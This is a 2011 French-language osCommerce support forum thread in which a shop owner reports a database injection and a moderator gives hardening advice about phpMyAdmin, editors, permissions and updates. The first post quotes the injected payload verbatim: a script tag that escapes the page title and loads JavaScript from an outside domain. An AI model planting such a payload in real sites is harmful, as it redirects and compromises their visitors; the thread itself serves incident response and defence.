osCommerce France : Accueil Forum Portail osCommerce France Réponses aux questions Foire aux contributions

Bienvenue invité ( Connexion | Inscription )

 
Reply to this topicStart new topic
> [Resolu] Code injecte : script src=http://exero.eu/catalog/jquery.js, Faille dans une requete et acces a la BD
ipolis
posté 3 Aug 2011, 15:45
Message #1


Ceinture jaune+ OSC
Icône de groupe

Groupe : Membres
Messages : 83
Inscrit : 9-May 04
Lieu : Poitou-Charentes
Membre no 2448



Bonjour a tous,

J'ai eu une injection de code dans la table configuration de ma boutique Osc.
Champ : configuration_value : code injecté : [Nom de ma boutique] </title><script src=http://exero.eu/catalog/jquery.js></script><title>

J'ai retiré ce code maléfique, qui redirigé et empeché toute execution du code suivant sur mes pages (Login, checkout, etc...)

Mon probleme maintenant : J'ai effectué y'a pas mal de temps toute la SECU initiale préconisé ici sur les forums depuis bien longtemps. ADMIN renomé, File_manager viré, fichier index.php et index.html dans les reps images, droits linux minimums pour OSC...

Seul un FckEditor et un TinyMCE sur cet hebergement me questionne coté SECU... (ou la je ne suis pas sur du tout de moi.. pffff)
(Je n'ai pas PHPMyvisites d'installés ni PHPBB... )

Ma question : comment proteger le MIEUX mon OSC pour eviter des injections dans la BD ? (J'ai lu les FAQs aussi et mis en pratique)
Des hackers d'un nouveau genre ?

Ce message a été modifié par ipolis - 6 Aug 2011, 16:24.


--------------------
MS2 2.3 FR avec des contribs ajoutées et du code, du code, du code.. :
Contribs: Module livraison par Pays et Zones, Autosauve, low stock,Product description, Google Position, seo, Google XML Sitemap - Admin 2.x, dhtmlcategories10, product-tabsv1-3_french, Products On Order 1.2 - Heb: Mutualisé OVH PRO
Go to the top of the page
 
chrysalide
posté 3 Aug 2011, 16:07
Message #2


Ceinture bleue OSC
Icône de groupe

Groupe : Modérateurs
Messages : 1085
Inscrit : 29-November 04
Membre no 3935



quel type d'hébergement utilises-tu ? mutu ou dedi ? et chez qui ? <- je n'avais pas lu ta signature......


edit : les répertoires de FckEditor et TinyMCE sont dans l'admin ?

Utilises tu d'autres contribs que celles inscritent dans ta signature ? comme Additional Images, etc.



--------------------
Petit guide pour résoudre tout vos problèmes avec Oscommerce

FORK perso a base de MS2 RC1 FR avec deux trois contribs + pas mal de dev perso + beaucoup (trop ?) d'Ajax + un peu mais pas trop de flash + virer la structure tableau + de feuille de style + pas mal de <DIV id="****">.......... en gros ca ressemble plus trop a l'originale
Go to the top of the page
 
ipolis
posté 3 Aug 2011, 16:16
Message #3


Ceinture jaune+ OSC
Icône de groupe

Groupe : Membres
Messages : 83
Inscrit : 9-May 04
Lieu : Poitou-Charentes
Membre no 2448



Je suis en MUTU chez OVH un 90 PLAN
et FCKEditor et TynyMCE sont dans l'admin

J'utilises la contrib que tu cites pour les images additionnelles
Et bien d'autres aussi, ma signature n'est pas à jour coté contribs.


Ce message a été modifié par ipolis - 3 Aug 2011, 16:20.


--------------------
MS2 2.3 FR avec des contribs ajoutées et du code, du code, du code.. :
Contribs: Module livraison par Pays et Zones, Autosauve, low stock,Product description, Google Position, seo, Google XML Sitemap - Admin 2.x, dhtmlcategories10, product-tabsv1-3_french, Products On Order 1.2 - Heb: Mutualisé OVH PRO
Go to the top of the page
 
chrysalide
posté 3 Aug 2011, 16:21
Message #4


Ceinture bleue OSC
Icône de groupe

Groupe : Modérateurs
Messages : 1085
Inscrit : 29-November 04
Membre no 3935



as tu installé phpmyadmin sur ton hébergement ou utilies tu celui d'OVH? si oui , ou ?

as tu vérifié les droit en lecture sur configure.php ? quels sont les droites sur ce fichier et sur le rep includes ?



--------------------
Petit guide pour résoudre tout vos problèmes avec Oscommerce

FORK perso a base de MS2 RC1 FR avec deux trois contribs + pas mal de dev perso + beaucoup (trop ?) d'Ajax + un peu mais pas trop de flash + virer la structure tableau + de feuille de style + pas mal de <DIV id="****">.......... en gros ca ressemble plus trop a l'originale
Go to the top of the page
 
chrysalide
posté 3 Aug 2011, 16:23
Message #5


Ceinture bleue OSC
Icône de groupe

Groupe : Modérateurs
Messages : 1085
Inscrit : 29-November 04
Membre no 3935



Citation (ipolis @ 3 Aug 2011, 16:16) *
J'utilises la contrib que tu cites pour les images additionnelles


verifies la version utilisée et mets a jour si necessaire.


--------------------
Petit guide pour résoudre tout vos problèmes avec Oscommerce

FORK perso a base de MS2 RC1 FR avec deux trois contribs + pas mal de dev perso + beaucoup (trop ?) d'Ajax + un peu mais pas trop de flash + virer la structure tableau + de feuille de style + pas mal de <DIV id="****">.......... en gros ca ressemble plus trop a l'originale
Go to the top of the page
 
ipolis
posté 3 Aug 2011, 16:26
Message #6


Ceinture jaune+ OSC
Icône de groupe

Groupe : Membres
Messages : 83
Inscrit : 9-May 04
Lieu : Poitou-Charentes
Membre no 2448




phpmyadmin installé a la racine du site et securisé apache

crawltrack et crawlprotect installé aussi

Cote version PhPMyadmin, je dois pas etre bien a jour...
Et pour le scripts des images additionnelles non plus...

Fckeditor et TYNYMce, y'a des versions securisé a jour integrable dans l'ADMIN de OSC sans trop modifier du code ?


--------------------
MS2 2.3 FR avec des contribs ajoutées et du code, du code, du code.. :
Contribs: Module livraison par Pays et Zones, Autosauve, low stock,Product description, Google Position, seo, Google XML Sitemap - Admin 2.x, dhtmlcategories10, product-tabsv1-3_french, Products On Order 1.2 - Heb: Mutualisé OVH PRO
Go to the top of the page
 
chrysalide
posté 3 Aug 2011, 16:31
Message #7


Ceinture bleue OSC
Icône de groupe

Groupe : Modérateurs
Messages : 1085
Inscrit : 29-November 04
Membre no 3935



Citation (ipolis @ 3 Aug 2011, 16:26) *
phpmyadmin installé a la racine du site et securisé apache


déplaces le dans le rep admin et que celui soit protégé par htaccess + htpasswd


--------------------
Petit guide pour résoudre tout vos problèmes avec Oscommerce

FORK perso a base de MS2 RC1 FR avec deux trois contribs + pas mal de dev perso + beaucoup (trop ?) d'Ajax + un peu mais pas trop de flash + virer la structure tableau + de feuille de style + pas mal de <DIV id="****">.......... en gros ca ressemble plus trop a l'originale
Go to the top of the page
 
ipolis
posté 6 Aug 2011, 16:23
Message #8


Ceinture jaune+ OSC
Icône de groupe

Groupe : Membres
Messages : 83
Inscrit : 9-May 04
Lieu : Poitou-Charentes
Membre no 2448



Bon voila qui semble etre tout a fait en ordre en appliquant vos conseils et en reprenant la FAQ
sur la Secu OSC..
Merci !


--------------------
MS2 2.3 FR avec des contribs ajoutées et du code, du code, du code.. :
Contribs: Module livraison par Pays et Zones, Autosauve, low stock,Product description, Google Position, seo, Google XML Sitemap - Admin 2.x, dhtmlcategories10, product-tabsv1-3_french, Products On Order 1.2 - Heb: Mutualisé OVH PRO
Go to the top of the page
 

Reply to this topicStart new topic
1 utilisateur(s) sur ce sujet (1 invité(s) et 0 utilisateur(s) anonyme(s))
0 membre(s) :

 



RSS Version bas débit Nous sommes le : 28th March 2024 - 16:00
Ce site est déclaré auprès de la commision Nationale
de l'Informatique et des Libertés (déclaration n°: 1043896)